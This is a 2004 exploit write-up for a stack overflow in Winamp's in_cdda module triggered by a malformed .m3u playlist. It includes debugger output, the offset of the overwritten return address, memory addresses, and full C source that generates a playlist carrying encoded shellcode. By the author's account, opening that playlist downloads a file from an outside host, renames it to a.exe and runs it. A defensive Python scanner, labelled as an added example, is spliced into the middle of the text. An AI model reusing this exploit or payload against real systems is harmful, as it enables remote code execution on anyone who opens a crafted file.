Author: ZwelL
Date: 2004.11.29
Team: shadoweyes
Last week Brett Moore released Winamp overflow vulnerabilities on Bugtraq, saying that there is a stack overflow in the in_cdda module affecting 5.05 and 5.06. Later, K-OTiK announced a MessageBox test for the vulnerability and gave the relevant code. But in later tests I found that the code given by K-OTiK did not work, so I did some debugging and found some problems.
Let's take a look at the part with the problem: when a playlist file (.m3u) is opened, Winamp calls in_cdda.dll to handle .cda entries. However, the CDDA library can only store a limited number of bytes for such an entry (K-OTiK's result on Spanish Windows XP Pro is 20 bytes, and it is 12 bytes on the Chinese version of Windows 2003 Server), resulting in a buffer overflow.
Debug with OllyDbg; first generate a malformed playlist file with a program:
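As an added example from a defender's side (not code from the original article), here is a small scanner that parses an .m3u playlist and flags .cda entries that look like an attempt to overflow the in_cdda buffer: entries longer than the reported buffer size, entries containing non-printable bytes, and entries carrying a run of NOPs. The 20-byte limit is the value the article reports for Spanish XP Pro; for other builds it is an assumption to tune. The sample playlist is constructed inline.

```python
# Added example, not from the original article: heuristic scanner for
# oversized or binary-laden .cda entries in an .m3u playlist.
import re

# Reported in_cdda entry buffer size (20 bytes on Spanish XP Pro per the
# article). Assumed for other builds; tune per Winamp/Windows version.
SAFE_CDA_ENTRY_LEN = 20
PRINTABLE = re.compile(rb"^[\x20-\x7e]*$")


def parse_m3u(data: bytes):
    """Return the non-comment entries of an .m3u playlist as raw byte strings."""
    entries = []
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"#"):  # #EXTM3U / #EXTINF are directives
            continue
        entries.append(line)
    return entries


def analyze_entry(entry: bytes, limit: int = SAFE_CDA_ENTRY_LEN):
    """Return the reasons an entry looks suspicious (empty list = benign)."""
    reasons = []
    if not entry.lower().endswith(b".cda"):
        return reasons  # only .cda entries are handed to in_cdda.dll
    if len(entry) > limit:
        reasons.append(f"cda entry length {len(entry)} exceeds {limit}")
    if not PRINTABLE.match(entry):
        reasons.append("cda entry contains non-printable bytes")
    if b"\x90" * 4 in entry:
        reasons.append("cda entry contains a NOP run")
    return reasons


def scan_playlist(data: bytes, limit: int = SAFE_CDA_ENTRY_LEN):
    """Map the index of each suspicious entry to its list of reasons."""
    findings = {}
    for i, entry in enumerate(parse_m3u(data)):
        reasons = analyze_entry(entry, limit)
        if reasons:
            findings[i] = reasons
    return findings


# Constructed sample: a benign mp3, a benign short .cda entry, and an
# oversized .cda entry padded with NOPs and filler bytes.
SAMPLE_PLAYLIST = (
    b"#EXTM3U\n"
    b"#EXTINF:123,Some Track\n"
    b"C:\\Music\\track01.mp3\n"
    b"D:\\Track01.cda\n"
    b"C:\\1234" + b"\x90" * 8 + b"A" * 40 + b".cda\n"
)

if __name__ == "__main__":
    for idx, reasons in scan_playlist(SAMPLE_PLAYLIST).items():
        print(f"entry {idx}: " + "; ".join(reasons))
```

Run it against a playlist received from an untrusted source before handing the file to the player; anything reported by `scan_playlist` is worth quarantining, since a legitimate .cda entry is short and purely printable.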
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HEADER "#EXTM3U\n"

/* "5678" sits where the return address is overwritten */
char shellcode[] =
    "C:\\1234567890ab1234.cda";

int main(int argc, char *argv[])
{
    FILE *fp;
    char *sc = (char *)malloc(sizeof(shellcode) + 1);
    if (sc == NULL)
    {
        printf("malloc error\n");
        return -1;
    }
    /* sizeof(shellcode) + 1, not sizeof(sc): sc is only a pointer */
    memset(sc, '\0', sizeof(shellcode) + 1);
    memcpy(sc, shellcode, sizeof(shellcode));
    fp = fopen("test.m3u", "w");
    if (!fp)
    {
        printf("error opening file.\n");
        free(sc);
        return -1;
    }
    fwrite(HEADER, 1, strlen(HEADER), fp);
    fwrite(sc, 1, strlen(sc), fp);
    fclose(fp);
    free(sc);
    return 0;
}
Open Winamp under OllyDbg, then open and play the generated file; OllyDbg stops at 10009BD8:
10009BD8  884C0430  MOV BYTE PTR SS:[ESP+EAX+30],CL
When you continue to execute, an exception occurs:
Access violation when executing [38373635]
That is, the position of "5678" is where the return address sits, and we can control it. One thing to note: during actual playback Winamp handles the first exception itself, so our shellcode only runs when the second exception occurs.
What remains is the problem of locating the shellcode; the relevant data is given here:
IN_CDDA:
Base = 10000000
Size = 00031000
Entry point = 1000CE1A
.data section offset: 00054000
Fill in our shellcode, then open and play the playlist; when OllyDbg stops, search in_cdda's address space for the data we filled in. The address differs between systems; on Windows 2003:
Version 5.02: 10023543
Version 5.05: 10024561
So to make the shellcode general, a large number of \x90 bytes would have to be filled in between these two addresses (this turned out not to be feasible, because of the byte limit).
During debugging I found that, after removing the ".cda" bytes and the "C:\1234xxxx" prefix, we can only fill 254 bytes, which is quite demanding for the shellcode. (In the overflow program given below I use
http://zwell.3322.org/a.exe; who knew that would exceed the byte limit, so there was no choice but to rename the program to a.a so that it could be executed, ^_^).
The code for generating the malformed playlist file is given below:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HEADER "#EXTM3U\n"

char shellcode[] =
    "C:\\1234"
    /* return address replacing "5678": 10023543 (Winamp 5.02, Windows 2003) */
    "\x43\x35\x02\x10"
    "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf1\x80\x34\x0b\x88\xe2\xfa\xeb\x05"
    "\xe8\xed\xff\xff\xff"
    "\x61\x2c\x88\x88\x88\xd7\xec\x29\xb8\x88\x88\x88\x03"
    "\x03\x94\x25\x03\x7f\xe2\x8c\xd1\x60\xcc\x88\x88\x88"
    "\x6a\x71\xe0\xe7\xe6\x88\x88\xe0\xfd\xfa\xe4\xe5\xdc\x77\x9e\x03"
    "\x60\x88\x88\x0b\x64\xa8\x03\x54\xe2\xa8\xdb\x77\xde"
    "\x8c\x4f\x8c\x8b\xd4\xe9\xa6\xed\x4f\xcc\x8b\x8c\xf0\xed\x88\x88"
    "\xbb\x48\xd8\xd8\xdb\xdf\xd8\x77\xde\x98\x03\x54\xd8\xdb\x77\xde"
    "\x80\x77\xde\x84\xd9\xde\x03\xfd\xb4\x03\xfc\xa6\xf0\x8b\x7d\xde"
    "\x03\xfe\xa8\x8b\x7d\xbb\x41\xc1\xc9\x25\x8b\x4d\xbb\x53\x87\x36"
    "\x98\xb2\x5e\xfc\x80\x49\x43\x85\x8b\x52\xc8\x63\xfd"
    "\x6f\xd6\x03\xd6\xac\x8b\x55\xee\x03\x84\xc3\x03\xd6\x94\x8b\x55"
    "\x03\x8c\x03\x8b\x4d\x23\xd6\xd1\x4b\x60\xdf\x77\x77\x77\x06\xc6"
    "\x86\x64\x49\x10\x76\x02\x86\xf6\x50\x6a\xfb\xbe\x92"
    "\xa7\xf8\xe0\xfc\xfc\xf8\xb2\xa7\xa7\xf2\xff\xed\xe4\xe4\xa6\xbb"
    /* trailing \x90 before ".cda": see the note at the end of the article */
    "\xbb\xba\xba\xa6\xe7\xfa\xef\xa7\xe9\xa6\xe9\x88\x90"
    ".cda";

int main(int argc, char *argv[])
{
    FILE *fp;
    char *sc = (char *)malloc(sizeof(shellcode) + 1);
    printf("Winamp 5.x m3u parsing PoC - advisory Brett Moore\n");
    printf("Author: zwell\tDate: 11.29\n");
    printf("thx to K-OTiK\n");
    printf("Tested on Winamp 5.02, Windows 2003 Server\n\n");
    if (sc == NULL)
    {
        printf("malloc error\n");
        return -1;
    }
    /* sizeof(shellcode) + 1, not sizeof(sc): sc is only a pointer */
    memset(sc, '\0', sizeof(shellcode) + 1);
    memcpy(sc, shellcode, sizeof(shellcode));
    fp = fopen("test.m3u", "w");
    if (!fp)
    {
        printf("error opening file.\n");
        free(sc);
        return -1;
    }
    fwrite(HEADER, 1, strlen(HEADER), fp);
    fwrite(sc, 1, strlen(sc), fp);
    fclose(fp);
    free(sc);
    printf("File test.m3u created.\n");
    return 0;
}
After the generated playlist file is played, it downloads
http://zwell.3322.org/a.a, renames it to a.exe and executes it; the result is a pop-up dialog box: Winamp Buffer overflow Testing.
Finally, one remaining problem: at the end I used \x90. In theory it is not necessary, but in practice the shellcode does not run without this NOP instruction; it seems to be related to the ".". If you know why, please explain it. ^_^
The technical content of this article == 0; I only hope it gives beginners some hands-on practice... ;-)